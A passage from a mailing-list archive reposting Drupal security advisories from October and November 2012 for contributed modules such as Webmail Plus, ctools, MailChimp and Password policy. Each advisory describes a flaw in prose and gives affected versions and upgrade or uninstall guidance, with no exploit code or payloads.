http://drupal.org/user/426416 [9] http://drupal.org/user/211387 [10] http://drupal.org/user/426416 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-170 - MultiLink - Access Bypass
View online: http://drupal.org/node/1853244 * Advisory ID: DRUPAL-SA-CONTRIB-2012-170 * Project: Multi-Language Link and Redirect (MultiLink) [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-November-28 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - MultiLink allows you to generate in-content links to a suitable node or node translation based on the visitor's language preferences. It allows the Node Title of the target node to be shown as the visible text and title attribute for the generated link. Prior to versions 6.x-2.7 and 7.x-2.7 the module doesn't check the the current user has access to a node referenced by the generated link, so that node title (only) may be disclosed to a user who would otherwise have no access to that node. This vulnerability is mitigated by the fact that an attacker must have a role with the permission to edit text using an Input Format for which the MultiLink Filter has been enabled. CVE: Requested VERSIONS AFFECTED --- * MulitLink 6.x-2.x versions prior to 6.x-2.7 [3]. * MulitLink 7.x-2.x versions prior to 7.x-2.7 [4]. Drupal core is not affected. If you do not use the contributed Multi-Language Link and Redirect (MultiLink) [5] module, there is nothing you need to do. SOLUTION Install the latest version - see the project page http://drupal.org/project/multilink [6] for downloads. Also see the Multi-Language Link and Redirect (MultiLink) [7] project page. REPORTED BY - * Andy Inman [8] the module maintainer FIXED BY * Andy Inman [9] the module maintainer COORDINATED BY -- * Stéphane Corlosquet [10] of the Drupal Security Team * Greg Knaddison [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/multilink [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/node/1289292 [4] http://drupal.org/node/1289294 [5] http://drupal.org/project/multilink [6] http://drupal.org/project/multilink [7] http://drupal.org/project/multilink [8] http://drupal.org/user/216383 [9] http://drupal.org/user/216383 [10] http://drupal.org/user/52142 [11] http://drupal.org/user/36762 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-171 - Webmail Plus - SQL injection - (unsupported)
View online: http://drupal.org/node/1853268 * Advisory ID: DRUPAL-SA-CONTRIB-2012-171 * Project: Webmail Plus [1] (third-party module) * Version: 6.x * Date: 2012-November-28 * Security risk: Critical [2] * Exploitable from: Remote * Vulnerability: SQL Injection DESCRIPTION - The Webmail plus module is a full-featured email client for Drupal. It's designed to provide email for any or all members of a Drupal site. The module doesn't sufficiently sanitize user input as it is used in a database query. CVE: Requested VERSIONS AFFECTED --- * All Webmail Plus module versions. Drupal core is not affected. If you do not use the contributed Webmail Plus [3] module, there is nothing you need to do. SOLUTION Uninstall the module: * If you use the Webmail Plus module you should disable the module. Also see the Webmail Plus [4] project page. REPORTED BY - * Fox [5] of the Drupal Security Team COORDINATED BY -- * Gerhard Killesreiter [6] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [7]. Learn more about the Drupal Security team and their policies [8], writing secure code for Drupal [9], and securing your site [10]. [1] http://drupal.org/project/webmail_plus [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/webmail_plus [4] http://drupal.org/project/webmail_plus [5] http://drupal.org/user/426464 [6] http://drupal.org/user/83 [7] http://drupal.org/contact [8] http://drupal.org/security-team [9] http://drupal.org/writing-secure-code [10] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-169 - Email Field - Cross Site Scripting and Access bypass
View online: http://drupal.org/node/1853214 * Advisory ID: DRUPAL-SA-CONTRIB-2012-169 * Project: Email Field [1] (third-party module) * Version: 6.x * Date: 2012-11-28 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting, Access bypass DESCRIPTION - The email module provides a field type (CCK / FieldAPI) for storing email addresses and a formatter to output the email address as a link to a contact form. The contact form formatter allows a site visitor to email the stored address without letting them see what that e-mail address is. Access bypass The module didn't sufficiently check access for the contact form page, allowing a site visitor to email the stored address on the entity without having access to the field itself. This vulnerability is mitigated by needing to to use a field permission module (other than CCK's Content Permissions) with those email fields and need to have the field contact field formatter configured for either full or teaser display modes. CVE: Requested Cross Site Scripting Furthermore the mailto link wasn't sanitized when output to the screen. This vulnerability is mitigated by the fact that Drupal's form validation for emails prevents malicious emails and would need to be bypassed to exploit this vulnerability, e.g. by importing data from external sources and not doing validation. CVE: Requested VERSIONS AFFECTED --- * Email Field 6.x-1.x versions prior to 6.x-1.3. Drupal core is not affected. If you do not use the contributed Email Field [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Email Field module for Drupal 6.x, upgrade to Email 6.x-1.4 [4] Also see the Email Field [5] project page. REPORTED BY - * Fox (hefox) [6] FIXED BY * Matthias Hutterer [7] the module maintainer COORDINATED BY -- * Fox (hefox) [8] of the Drupal Security Team * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/email [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/email [4] http://drupal.org/node/1852612 [5] http://drupal.org/project/email [6] http://drupal.org/user/426416 [7] http://drupal.org/user/59747 [8] http://drupal.org/user/426416 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-167 - Mixpanel - Cross site scripting (XSS)
View online: http://drupal.org/node/1853198 * Advisory ID: DRUPAL-SA-CONTRIB-2012-167 * Project: Mixpanel [1] (third-party module) * Version: 6.x * Date: 2012-November-28 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This module provides integration with the Mixpanel real-time analytics service. The module doesn't sufficiently escape the Mixpanel token when adding the tracking Javascript to the page. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "access administration pages". CVE: Requested VERSIONS AFFECTED --- * Mixpanel 6.x-1.x versions prior to 6.x-1.1. Drupal core is not affected. If you do not use the contributed Mixpanel [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Mixpanel module for Drupal 6.x, upgrade to Mixpanel 6.x-1.1 [4] Also see the Mixpanel [5] project page. REPORTED BY - * David Snopek [6] FIXED BY * wundo [7] the module maintainer * David Snopek [8] COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/mixpanel [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/mixpanel [4] http://drupal.org/node/1852098 [5] http://drupal.org/project/mixpanel [6] http://drupal.org/user/266527 [7] http://drupal.org/user/25523 [8] http://drupal.org/user/266527 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-166 - Table of Contents - Access Bypass
View online: http://drupal.org/node/1841046 * Advisory ID: DRUPAL-SA-CONTRIB-2012-166 * Project: Table of Contents [1] (third-party module) * Version: 6.x * Date: 2012-November-14 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - This module enables you to generates a list of select header tags in a box that looks like a table of contents or summary. The links added to that box point to the headers so users can quickly access each section of your documents. The module doesn't sufficiently check for node access restrictions when displaying the table of contents in a block. This vulnerability is mitigated by the fact that an attacker must find a node that is not visible to him/her and yet displays its blocks including the table of contents block. In some Drupal installations, this can happen for unpublished nodes. Also, the attacker will only see the headers (content between H1 to H6 tags) appearing in the table of contents, not the entire page. CVE: Requested VERSIONS AFFECTED --- * tableofcontents 6.x-3.x versions prior to 6.x-3.8. Drupal core is not affected. If you do not use the contributed Table of Contents [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the table of contents module for Drupal 6.x, upgrade to tableofcontents 6.x-3.8 [4] Also see the Table of Contents [5] project page. REPORTED BY - * Erik Webb [6] FIXED BY * Erik Webb [7] the reporter * Alexis Wilke [8] the Drupal 6.x maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/tableofcontents [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/tableofcontents [4] http://drupal.org/node/1841026 [5] http://drupal.org/project/tableofcontents [6] http://drupal.org/user/273404 [7] http://drupal.org/user/273404 [8] http://drupal.org/user/356197 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-165 - Chaos tool suite (ctools) - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1840992 * Advisory ID: DRUPAL-SA-CONTRIB-2012-165 * Project: Chaos tool suite (ctools) [1] (third-party module) * Version: 6.x * Date: 2012-November-14 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The Chaos tool suite is primarily a set of APIs and tools to improve the developer experience. The page manager node view task does not sufficiently escape node titles when setting the page title, allowing XSS. This vulnerability is partially mitigate by the node task being disabled by default and limited to users that have the ability to submit or edit nodes. CVE: Requested VERSIONS AFFECTED --- * Chaos tool suite (ctools) 6.x-1.x versions prior to 6.x-1.10. Drupal core is not affected. If you do not use the contributed Chaos tool suite (ctools) [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Chaos tool suite (ctools) module for Drupal 6.x, upgrade to Chaos tool suite (ctools) 6.x-1.10 [4] Also see the Chaos tool suite (ctools) [5] project page. REPORTED BY - * Justin KleinKeane [6] * Andrey Tretyakov [7] FIXED BY * Earl Miles (merlinofchaos) [8] COORDINATED BY -- * Klaus Purer [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/ctools [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/ctools [4] http://drupal.org/node/1841030 [5] http://drupal.org/project/ctools [6] http://drupal.org/user/302225 [7] http://drupal.org/user/169459 [8] http://drupal.org/user/26979 [9] http://drupal.org/user/262198 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-164 - Smiley module and Smileys module - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1840892 * Advisory ID: DRUPAL-SA-CONTRIB-2012-164 * Project: Smiley [1] (third-party module) * Project: Smileys [2] (third-party module) * Version: 6.x * Date: 2012-November-14 * Security risk: Moderately critical [3] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - These modules enable you to substitutes text emoticons, like :-), with images. These modules don't sufficiently sanitize user defined smiley acronyms before displaying smiley images. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer smiley". These two modules are based on the same codebase and Smiley was forked due to lack of new feature development in the Smileys project. This single Security Advisory covers the same issue in the code of both modules. CVE: Requested VERSIONS AFFECTED --- * Smiley 6.x-1.x versions prior to 6.x-1.1. * Smileys 6.x-1.x versions prior to 6.x-1.1. Drupal core is not affected. If you do not use the contributed Smiley [4] module, or the Smileys [5] module there is nothing you need to do. SOLUTION Install the latest version: * If you use the Smiley module for Drupal 6.x, upgrade to Smiley 6.x-1.1 [6] * If you use the Smileys module for Drupal 6.x, upgrade to Smileys 6.x-1.1 [7] Also see the Smiley [8] project page. REPORTED BY - * Jimmy Axenhus [9] FIXED BY * Yonas Yanfa [10] the module maintainer COORDINATED BY -- * Michael Hess [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/smiley [2] http://drupal.org/project/smileys [3] http://drupal.org/security-team/risk-levels [4] http://drupal.org/project/smiley [5] http://drupal.org/project/smileys [6] http://drupal.org/node/1840956 [7] http://drupal.org/node/1840954 [8] http://drupal.org/project/smiley [9] http://drupal.org/user/565562 [10] http://drupal.org/user/473174 [11] http://drupal.org/user/102818 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-162 - RESTful Web Services - Cross site request forgery (CSRF)
View online: http://drupal.org/node/1840740 * Advisory ID: DRUPAL-SA-CONTRIB-2012-162 * Project: RESTful Web Services [1] (third-party module) * Version: 7.x * Date: 2012-November-14 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Request Forgery DESCRIPTION - This module enables you to expose Drupal entities as RESTful web services. It provides a machine-readable interface to exchange resources in JSON, XML and RDF. The module doesn't sufficiently verify POST requests thereby exposing a Cross Site Request Forgery vulnerability. This vulnerability is mitigated by the fact that an attacker must trick an authenticated user onto a page with a site-specific malicious HTML form submission. CVE: Requested VERSIONS AFFECTED --- * RESTWS 7.x-1.x versions prior to 7.x-1.1. * RESTWS 7.x-2.x versions prior to 7.x-2.0-alpha3. Drupal core is not affected. If you do not use the contributed RESTful Web Services [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the RESTWS 1.x module for Drupal 7.x, upgrade to RESTWS 7.x-1.1 [4] * If you use the RESTWS 2.x module for Drupal 7.x, upgrade to RESTWS 7.x-2.0-alpha3 [5] Also see the RESTful Web Services [6] project page. REPORTED BY - * Damien Tournoud [7] of the Drupal Security Team * Klaus Purer [8] of the Drupal Security Team FIXED BY * Klaus Purer [9] the module maintainer COORDINATED BY -- * Klaus Purer [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/restws [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/restws [4] http://drupal.org/node/1840722 [5] http://drupal.org/node/1840728 [6] http://drupal.org/project/restws [7] http://drupal.org/user/22211 [8] http://drupal.org/user/262198 [9] http://drupal.org/user/262198 [10] http://drupal.org/user/262198 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-163 - User Read-Only - Permission escalation
View online: http://drupal.org/node/1840886 * Advisory ID: DRUPAL-SA-CONTRIB-2012-163 * Project: User Read-Only [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-November-14 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - User Read-only is a module that allows an administrator to prevent modification of user account/profile fields. The administrator can select which fields will allow or disallow editing. The module can mistakenly assign roles when performing unrelated operations against a user's account such as changing a password. The vulnerability is particular to certain combinations of configuration and the number of roles available on the site (more than 3). CVE: Requested VERSIONS AFFECTED --- * User Read-Only 6.x-1.x versions prior to 6.x-1.4. * User Read-Only 7.x-1.x versions prior to 7.x-1.4. Drupal core is not affected. If you do not use the contributed User Read-Only [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the User Read-Only module for Drupal 6.x, upgrade to User Read-Only 6.x-1.4 [4] * If you use the User Read-Only module for Drupal 7.x, upgrade to User Read-Only 7.x-1.4 [5] Also see the User Read-Only [6] project page. REPORTED BY - * Kellie Bradford Delaney [7] FIXED BY * David Norman [8] the module maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team * Heine Deelstra [10] of the Drupal Security Team * Lee Rowlands [11] provisional member of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/user_readonly [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/user_readonly [4] http://drupal.org/node/1840054 [5] http://drupal.org/node/1840038 [6] http://drupal.org/project/user_readonly [7] http://drupal.org/user/1473110 [8] http://drupal.org/user/972 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/17943 [11] http://drupal.org/user/395439 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-160 - OM Maximenu - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1834866 * Advisory ID: DRUPAL-SA-CONTRIB-2012-160 * Project: OM Maximenu [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-November-07 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This module enables you to create custom menus with effects and integrate module blocks as it's menu item content. The module doesn't sufficiently state the risk of giving permission to create OM Maximenus. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer OM Maximenu". CVE: Requested VERSIONS AFFECTED --- * OM Maximenu 6.x-1.x versions prior to 6.x-1.44. * OM Maximenu 7.x-1.x versions prior to 7.x-1.44. Drupal core is not affected. If you do not use the contributed OM Maximenu [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the OM Maximenu module for Drupal 6.x, upgrade to OM Maximenu 6.x-1.44 [4] * If you use the OM Maximenu module for Drupal 7.x, upgrade to OM Maximenu 7.x-1.44 [5] Also see the OM Maximenu [6] project page. REPORTED BY - * Justin KleinKeane [7] FIXED BY * Daniel Honrade [8] the module maintainer * Károly Négyesi [9] of the Drupal Security Team COORDINATED BY -- * Greg Knaddison [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/om_maximenu [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/om_maximenu [4] http://drupal.org/node/1834046 [5] http://drupal.org/node/1834048 [6] http://drupal.org/project/om_maximenu [7] http://drupal.org/user/302225 [8] http://drupal.org/user/351112 [9] http://drupal.org/user/9446 [10] http://drupal.org/user/36762 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-161 - Webform CiviCRM Integration - Access Bypass
View online: http://drupal.org/node/1834868 * Advisory ID: DRUPAL-SA-CONTRIB-2012-161 * Project: Webform CiviCRM Integration [1] (third-party module) * Version: 7.x * Date: 2012-November-07 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - Webform CiviCRM integration allows you to expose contact data via Webforms. Depending on what fields you have exposed in your form, this may include personal information such as birthdate, phone number, email address, etc. Proper permission settings are important to keep this information from prying eyes. Each "existing contact" on a webform has a setting to enforce CiviCRM permissions -- this setting should rarely be disabled, and only done so by admins who know what they're doing. Unfortunately some circumstances may have led this setting to be incorrectly disabled by the admin: * In version 3.0 - 3.1 of this module, "Enforce Permissions" was not on by default, and needed to be manually selected by the admin. This was fixed in 3.2. * In versions 3.0 - 3.2, the current user could not be autofilled for normal unprivledged users. This may have led some admins to disable the "Enforce Permissions" setting, a dangerous workaround. * In versions 3.0 - 3.3, autofilling a contact via the url with a checksum did not work for anonymous users unless the "Enforce Permissions" setting was disabled. Version 3.4 includes an update script which will automatically set "Enforce Permissions" for all existing contacts to /true/. Once you have upgraded, you may wish to review your webforms and ensure that autofilling contacts works as expected, especially for anonymous users. In a few rare cases where you have established access control through some other means, disabling "Enforce Permissions" may be necessary and you will need to do so manually. CVE: Requested VERSIONS AFFECTED --- * Webform CiviCRM Integration 7.x-3.0 to 7.x-3.3 Drupal core is not affected. If you do not use the contributed Webform CiviCRM Integration [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use Webform CiviCRM Integration version 3.x, upgrade to version 3.4 [4] Also see the Webform CiviCRM Integration [5] project page. REPORTED BY - * Coleman Watts [6] the module maintainer FIXED BY * Coleman Watts [7] the module maintainer COORDINATED BY -- * Greg Knaddison [8] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/webform_civicrm [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/webform_civicrm [4] http://drupal.org/node/1833974 [5] http://drupal.org/project/webform_civicrm [6] http://drupal.org/user/639856 [7] http://drupal.org/user/639856 [8] http://drupal.org/user/36762 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-159 - Password policy - Information leakage of hashed passwords
View online: https://drupal.org/node/1828340 * Advisory ID: DRUPAL-SA-CONTRIB-2012-159 * Project: Password policy [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-October-31 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Information Disclosure DESCRIPTION - This module provides a way to specify a certain level of password complexity (aka. "password hardening") for user passwords on a system by defining a password policy. The Password policy module allows administrators to request users to enter a new password that does not match any of the previous X passwords they have used (X is determined by the site configuration). If this feature is enabled, a malicious user with the capability to view another user's HTTP traffic can discover the hashed version of their password. This issue is more of a risk for Drupal 6 sites that use the default md5 password encryption. This issue only affects sites that use the module's "previous passwords" feature, and fail to encrypt their users' HTTP transactions with SSL/TLS. CVE: Requested VERSIONS AFFECTED --- * Password policy 6.x-1.x versions prior to 6.x-1.5. * Password policy 7.x-1.x versions prior to 7.x-1.3. Drupal core is not affected. If you do not use the contributed Password policy [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Password policy module for Drupal 6.x, upgrade to Password policy 6.x-1.5 [4] * If you use the Password policy module for Drupal 7.x, upgrade to Password policy 7.x-1.3 [5] Also see the Password policy [6] project page. REPORTED BY - * Alexis Wilke [7] FIXED BY * Mark Shropshire [8] COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team * Michael Hess [10] of the Drupal Security Team * Damien Tournoud [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/password_policy [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/password_policy [4] https://drupal.org/node/1828130 [5] https://drupal.org/node/1828142 [6] http://drupal.org/project/password_policy [7] http://drupal.org/user/356197 [8] http://drupal.org/user/14767 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/102818 [11] http://drupal.org/user/22211 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-158 - MailChimp - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1822166 * Advisory ID: DRUPAL-SA-CONTRIB-2012-158 * Project: MailChimp [1] (third-party module) * Version: 7.x * Date: 2012-October-24 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This module provides integration with the MailChimp email delivery service. There are two issues with the webhook processing, which is exposed as an API in mailchimp.module and used by mailchimp_lists.module to update subscriber information. * The webhook URL key can be trivially calculated. * Webhook variables from POST requests are not properly sanitized. Mitigating these issues is the fact that attackers cannot tamper with email subscriptions even if they know the webhook path, because changes are pulled in from the MailChimp API only. CVE: Requested VERSIONS AFFECTED --- * MailChimp 7.x-2.x versions prior to 7.x-2.7. Drupal core is not affected. If you do not use the contributed MailChimp [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the MailChimp module for Drupal 7.x, upgrade to MailChimp 7.x-2.7 [4] Also see the MailChimp [5] project page. REPORTED BY - * Dmitriy Trt [6] (Dmitriy.trt) FIXED BY * Lev Tsypin [7] (levelos) the module maintainer COORDINATED BY -- * Klaus Purer [8] (klausi) of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/mailchimp [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/mailchimp [4] http://drupal.org/node/1821330 [5] http://drupal.org/project/mailchimp [6] http://drupal.org/user/329125 [7] http://drupal.org/user/54135 [8] http://drupal.org/user/262198 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-157 - Time Spent - Multiple Vulnerabilities - (unsupported)
